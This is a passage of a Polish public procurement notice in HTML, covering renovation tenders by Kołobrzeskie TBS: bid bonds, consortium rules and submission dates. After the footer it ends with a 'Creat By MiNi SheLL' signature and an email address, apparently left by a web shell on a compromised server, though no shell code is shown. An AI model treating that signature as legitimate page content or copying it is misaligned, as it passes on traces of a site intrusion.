potwierdzającym, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tego podmiotu; Ww. dokument należy złożyć tylko wtedy, gdy wykonawca polega na zdolnościach lub sytuacji podmiotu udostępniającego zasoby.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane wraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie,<br/>przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty zasoby (wg wzoru stanowiącego załącznik nr 5 do SWZ);<br/>wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień,<br/>doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (wg wzoru stanowiącego załącznik nr 6 do SWZ).<br/>Wykaz sprzętu, narzędziami, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania niniejszego zamówienia (wg wzoru stanowiącego załącznik nr 5 do SWZ).<br/>Na podstawie art. 128 ust. 1 ustawy Pzp, jeżeli wykonawca nie złoży oświadczenia, o którym mowa w art. 125 ust. 1 ustawy Pzp, podmiotowych środków dowodowych, innych dokumentów lub oświadczeń składanych w postępowaniu lub będą one niekompletne lub będą zawierać błędy, zamawiający wezwie wykonawcę odpowiednio do ich złożenia, poprawienia lub uzupełnienia w wyznaczonym terminie z zastrzeżeniem art. 128 ust. 1 pkt 1 i 2 ustawy Pzp.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> NIE <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zgodnie z treścią rozdziału X SWZ<br/>Wykonawca przystępujący do postępowania o udzielenie zamówienia publicznego jest zobowiązany przed upływem terminu składania ofert wnieść wadium w wysokości:<br/>CZĘŚĆ 1 - roboty remontowo budowlane w branży ogólnobudowlanej i sanitarnej 10.000,00 zł<br/>CZĘŚĆ 2 - roboty remontowo budowlane w branży elektrycznej 5.000,00 zł<br/>2. Ustala się termin wniesienia wadium lub wpłynięcia na konto Kołobrzeskiego TBS Sp. z o.o. do dnia 17.08.2021 roku do godziny 09:00.<br/>3. Wadium może być wniesione:<br/>1) w pieniądzu przelewem na konto Kołobrzeskiego Towarzystwa Budownictwa<br/>Społecznego Sp. z o.o. - Bank PeKaO S.A. I O/ Kołobrzeg - nr konta: 18 1240 6508 1111 0000 5404 7408 z dopiskiem „Wadium: DOZ/03/2021/REMONTY BUDYNKI GMK”.<br/>2) w gwarancjach bankowych, gwarancjach ubezpieczeniowych oraz poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000<br/>roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572). <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> PODMIOTY WYSTĘPUJĄCE WSPÓLNIE<br/>1. Wykonawcy ubiegający się wspólnie o zamówienie (w tym również spółki cywilne) ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego.<br/>2. Pełnomocnik pozostaje w kontakcie z Zamawiającym w toku postępowania i do niego Zamawiający kieruje informacje, korespondencję, itp. Pełnomocnictwo, o którym mowa w pkt. 1 musi znajdować się w ofercie wspólnej wykonawców. Pełnomocnictwo musi być złożone w oryginale lub kopii poświadczonej za zgodność z oryginałem przez notariusza.<br/>3. Oferta podmiotów występujących wspólnie winna zawierać:<br/>1) upoważnienie i pełnomocnictwo, z którego wynika prawo do reprezentowania<br/>poszczególnych Wykonawców wspólnie ubiegających się o udzielenie zamówienia, jeżeli prawo to nie wynika z załączonych dokumentów (m.in. w celu zweryfikowania czy prawidłowo został ustanowiony pełnomocnik o którym mowa w pkt 1),<br/>2) ofertę cenową sporządzoną wg formularza oferty stanowiącego Załącznik nr 1 do niniejszej SWZ, podpisaną przez pełnomocnika, o którym mowa w pkt 1.<br/>3) dokumenty i oświadczenie potwierdzające spełnianie przez podmioty warunku nie podlegania wykluczeniu oraz warunków udziału w postępowaniu określone w części VII niniejszej Specyfikacji<br/>4. Do przygotowywania oferty stosuje się zasady wymienione w pkt 2 do 4 części VIII SWZ „OPIS PRZYGOTOWANIA OFERT”, przy czym kopie dokumentów dotyczących każdego z Wykonawców składających ofertę wspólną muszą być poświadczone za zgodność z oryginałem przez osobę lub osoby upoważnione do reprezentowania tych Wykonawców (a nie np. przez pełnomocnika konsorcjum). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiana treści umowy może nastąpić w przypadkach określonych we wzorze umowy załączonym do niniejszej SWZ oraz wypadkach wskazanych w ustawie Pzp.Zamawiający dopuszcza możliwości zmian w umowie na podstawie art. 455 ust. 1, ust. 2 , ust. 3, ust. 4, nie naruszając art. 454 ustawy Pzp. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-17 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://kolobrzeskietbs.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-17 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-08-03 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com